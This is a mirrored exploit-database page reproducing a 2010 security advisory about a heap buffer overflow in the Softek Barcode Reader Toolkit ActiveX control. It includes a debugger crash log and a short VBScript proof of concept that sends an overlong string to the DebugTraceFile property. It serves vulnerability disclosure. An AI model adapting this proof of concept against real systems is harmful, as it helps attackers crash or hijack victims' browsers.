Home / os / win7

[remote exploits] - Softek Barcode Reader Toolkit ActiveX 7.

Posted on 21 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: remote exploits | Exploit author: LiquidWorm' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================================
Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC
==================================================================================

Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14
 
Summary: The Softek Barcode Reader Toolkit for Windows is a SDK that enables applications
to extract barcode information from images. The API&#039;s available in the toolkit include .net,
java, com, ocx and windows dll. The standard version includes support for both 1 and 2-D
barcodes and special features include the ability to split documents by barcode position.
 
Desc: The vulnerability is caused due to a boundary error in SoftekATL.DLL when handling the
value assigned to the &quot;DebugTraceFile&quot; property and can be exploited to cause a heap-based
buffer overflow via an overly long string which may lead to execution of arbitrary code.
 
 
--------------------------------------------------------------------------
 
(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4444443c=????
0:000&gt; g
(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4242423a=????
0:000&gt; g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3              ret
 
-----------------------
 
EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -&gt; 0013F0FC
EDX 00470608 -&gt; 00152CA0
EDI 42424239
ESI 00470000 -&gt; 000000C8
EBP 0013F10C -&gt; 0013F1F4
ESP 0013F0AC -&gt; 00470000
 
--------------------------------------------------------------------------
 
 
 
Tested on: Microsoft Windows XP Professional SP3 (English)
           Microsoft Windows Internet Explorer 8.0.6001.18702
           Softek Barcode Reader 7.3.1
 
 
 
Vulnerability discovered by: Gjoko &#039;LiquidWorm&#039; Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
 
21.09.2010
 
 
Advisory ID: ZSL-2010-4965
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4965.php
 
 
 
Proof of Concept:
-----------------
 
&lt;object classid=&#039;clsid:11E7DA45-B56D-4078-89F6-D3D651EC4CD6&#039; id=&#039;bardecode&#039; /&gt;
&lt;script language=&#039;vbscript&#039;&gt;
 
targetFile = &quot;C:Program FilesSoftek SoftwareSoftek Barcode ToolkitinSoftekATL.dll&quot;
prototype  = &quot;Property Let DebugTraceFile As String&quot;
memberName = &quot;DebugTraceFile&quot;
progid     = &quot;SoftekATL.CBarcode&quot;
argCount   = 1
 
buffof = String(262, &quot;A&quot;) + &quot;BBBB&quot; + String(4408, &quot;C&quot;) + &quot;DDDD&quot;
 
bardecode.DebugTraceFile = buffof
 
&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-21]</pre></body></html>

 

TOP

Malware :

Exploits :